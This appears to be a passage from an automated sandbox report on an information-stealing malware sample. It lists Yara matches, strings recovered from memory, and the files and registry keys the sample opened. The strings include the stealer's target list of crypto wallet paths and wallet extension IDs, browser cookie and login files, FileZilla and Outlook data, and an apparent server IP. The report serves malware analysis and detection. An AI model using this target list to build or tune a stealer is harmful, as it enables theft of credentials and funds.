Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\ElectronCash\wallets\\*.*
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.json
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1506072996.0000000001FC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 25bb638aac.exe PID: 2184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR